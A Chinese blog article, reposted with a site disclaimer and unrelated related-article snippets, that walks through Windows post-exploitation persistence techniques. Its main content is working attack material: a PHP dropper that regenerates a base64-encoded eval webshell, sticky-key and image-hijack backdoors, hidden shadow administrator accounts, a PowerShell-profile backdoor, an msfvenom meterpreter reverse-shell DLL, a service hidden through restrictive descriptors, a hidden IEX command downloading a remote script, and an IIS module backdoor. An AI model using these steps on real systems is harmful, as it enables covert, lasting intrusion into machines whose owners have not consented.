windows权限维持

文章目录

  • 不死马权限维持
  • 映像劫持技术
  • 策略组脚本维持
  • shift粘滞键后门
  • 建立影子账号
  • powershell配置文件后门
  • Monitor权限维持
  • 利用安全描述符隐藏服务后门进行权限维持
  • iis后门
  • window隐藏技术
  • 驱动级文件隐藏

不死马权限维持

<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+";//c
$txt=base64_decode($txt);
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>

映像劫持技术

进入注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File
Execution Options

在下面添加一项,这里的命名与后续要触发的可执行文件程序文件名一致,这里我新建coleak.exe为后门文件,然后在coleak.exe的右侧新建一个Debugger,在输入值的栏目中填入你的后门绝对路径径,修改一个文件的文件名为coleak.exe 双击 即可触发。

在这里插入图片描述

运行命名为coleak.exe的文件时将会被替代为运行s.exe

策略组脚本维持

输入gpedit.msc 打开组策略,打开 windows设置 脚本 里面又关机和开机

在C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup上传s.exe(或者直接选择c盘中的s.exe), 启动时选择该文件即可

shift粘滞键后门

更改sethc.exe拥有者 为administrator

move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\s.exe C:\windows\system32\sethc.exe

建立影子账号

创建一个带$符号的账户,因为在常规cmd下是无法查看到的。

net user coleak$ p-0p-0p-0 /add
net localgroup administrators coleak$ /add
net users

打开注册表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User

3ea是coleak$用户 1F4是超级管理员的值

将1F4下F项的值复制到3ea下F项里面,替换原有数据。然后导出coleak$以及3EA

ner user moonsec$ /del 删除这个用户 再导入注册表 用户已经不显示在这个面板了。

powershell配置文件后门

Powershell配置文件其实就是一个powershell脚本,他可以在每次运行powershell的时候自动运行,所

以可以通过向该文件写入自定义的语句用来长期维持权限。

依次输入以下命令,查看当前是否存在配置文件。

echo $profile
# C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
Test-path $profile
# False
New-Item -Path $profile -Type File –Force

设置1.bat

net user coleak 123456 /add & net localgroup administrators coleak /add

$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile

Monitor权限维持

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=12345 -f dll > shell.dll
copy C:\temp\shell.dll C:\Windows\System32\test.dll
cd C:\Windows\System32\
Monitor.exe

利用安全描述符隐藏服务后门进行权限维持

cmd创建自启动服务
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\s.exe" depend= Tcpip obj= Localsystem start= autosc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

查询不到服务

sc query |findstr ".NET CLR Networking 3.5.0.0"
get-service | findstr ".NET CLR Networking 3.5.0.0"
sc query ".NET CLR Networking 3.5.0.0"   #拒绝访问

修改注册表的DACL来拒绝对值的查询,达到隐藏异常值的效果

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.NET CLR Networking 3.5.0.0

function Server-Sddl-Change{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][String]$Name
)
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"QueryValues"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Deny"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access =[System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSu
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang
ePermissions,TakeOwnership"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Allow"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
}

powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.10.128/1.ps1'));Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"

iis后门

web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><modules><add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" /></modules></system.webServer>
</configuration>

在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面,打开 IIS_backdoor_shell 把网址填写进去即可执行命令

在这里插入图片描述

window隐藏技术

Attrib +s +a +h +r s.exe

驱动级文件隐藏

Easy File Locker

如何清除?
1、查询服务状态: sc qc xlkfs
2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现
3、删除服务: sc delete xlkfs
4、删除系统目录下面的文件,重启系统,确认服务已经被清理了。
indow隐藏技术

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/26771.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java将获取的参数,图片以及pdf文件放入到word文档指定位置

Java将获取的参数,图片以及pdf文件放入到word文档指定位置

首先引入的依赖 <!-- poi库 --> <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId><version>4.1.2</version></dependency><dependency><groupId>org.apache.poi</groupId&…
阅读更多...
配置spark

配置spark

配置spark Yarn 模式Standalone 模式Local 模式 Yarn 模式 tar -zxvf spark-3.0.0-bin-hadoop3.2.tgz -C /opt/module cd /opt/module mv spark-3.0.0-bin-hadoop3.2 spark-yarn修改 hadoop 配置文件/opt/module/hadoop/etc/hadoop/yarn-site.xml, 并分发 <!--是否启动一…
阅读更多...
短视频矩阵系统源码--开发实践

短视频矩阵系统源码--开发实践

短视频矩阵系统源码开发技术&#xff1a; 1. 数据采集&#xff1a;使用Python的requests库进行数据爬取&#xff0c;使用Selenium模拟浏览器操作&#xff0c;解决抖音反爬虫机制。 2. 数据处理&#xff1a;使用Python的正则表达式、BeautifulSoup等库进行数据处理。 3. 关键…
阅读更多...
【C++医学影像PACS】CT检查中的三维重建是什么检查?

【C++医学影像PACS】CT检查中的三维重建是什么检查?

一、【PACS影像科普】CT检查中的三维重建是什么检查&#xff1f; 三维重建是多层螺旋CT的一个最大的优点&#xff0c;也是影像工作多年来&#xff0c;从横断解剖到多平面&#xff0c;乃至立体的一次飞跃&#xff0c;让抽象变的形象&#xff0c;大大地提高了准确性&#xff0c;为…
阅读更多...
力扣142. 环形链表 II

力扣142. 环形链表 II

题目 给定一个链表的头节点head&#xff0c;返回链表开始入环的第一个节点。 如果链表无环&#xff0c;则返回null。 链接&#xff1a;142. 环形链表 II - 力扣&#xff08;LeetCode&#xff09; 题解 方法一&#xff1a;设置两个指针&#xff0c;一个指针指向链表头结点&#…
阅读更多...
支付通道及系统设计

支付通道及系统设计

支付渠道&#xff0c;也可以叫支付通道&#xff0c;是指能够提供资金流转功能的通道&#xff0c;包括但不限于银行、第三方支付机构。我们常见的借记卡&#xff08;储蓄卡&#xff09;、贷记卡&#xff08;信用卡&#xff09;、微信、支付宝、云闪付等支付方式&#xff0c;都是…
阅读更多...
使用vue3 + Ts + Vite + ElementPlus实现一个抽奖程序

使用vue3 + Ts + Vite + ElementPlus实现一个抽奖程序

一. 说明 这是一个通过vue3 Ts Vite ElementPlus实现的一个抽奖程序。项目链接 二. 整体架构与功能描述 左侧设置了奖品说明&#xff0c;每个奖项配有文字和图片简介。总共设置了四个奖项&#xff0c;分别是特等奖1名&#xff0c;一等奖2名&#xff0c;二等奖5名&#xf…
阅读更多...
Eureka的使用手册

Eureka的使用手册

一、导入依赖&#xff08;服务端和客户端导入的依赖不一样&#xff09; 服务端&#xff1a; <dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-starter-netflix-eureka-server</artifactId> </dependenc…
阅读更多...
Camtasia Studio 2023怎么导出mp4格式的视频的详细教程介绍

Camtasia Studio 2023怎么导出mp4格式的视频的详细教程介绍

很多用户刚接触Camtasia Studio 2023&#xff0c;不熟悉如何保存mp4格式的视频。在今天的文章中小编为大家带来了Camtasia Studio 2023保存为mp4格式的视频的详细教程介绍。 Camtasia Studio 2023保存为mp4格式的视频的详细教程 1、 打开Camtasia Studio。 Camtasia Studio- …
阅读更多...
[相遇 Bug] - ImportError: numpy.core.multiarray failed to import

[相遇 Bug] - ImportError: numpy.core.multiarray failed to import

背景: 因为最近在看点云模型, 在自己的环境上部署该项目: https://github.com/open-mmlab/OpenPCDet/tree/master 执行命令: 这里执行github项目给的demo.py文件, 命令格式如下: python demo.py --cfg_file cfgs/kitti_models/pointpillar.yaml --ckpt xxx/pointpillar_772…
阅读更多...
PLSQL编程

PLSQL编程

1.概念和目的 1.1. 什么是PL/SQL? PL/SQL&#xff08;Procedure Language/SQL&#xff09; 是Oracle对sql语言的过程化扩展 (类似于Basic)&#xff1b; 指在SQL命令语言中增加了过程处理语句&#xff08;如分支、循环等&#xff09;&#xff0c;使SQL语言具有过程处理能力。…
阅读更多...
做渲染多好的CPU配置才够用?经常看到的核心和线程数到底是什么?

做渲染多好的CPU配置才够用?经常看到的核心和线程数到底是什么?

很多设计师想买一台做渲染的电脑时&#xff0c;经常会看到处理器&#xff08;CPU&#xff09;的介绍中提到几核几线程的信息&#xff0c;却不懂到底是什么意思。其实CPU的几核几线程是指CPU的核心数和线程数&#xff0c;它们是衡量CPU性能的两个重要指标。那么做渲染要有多好的…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023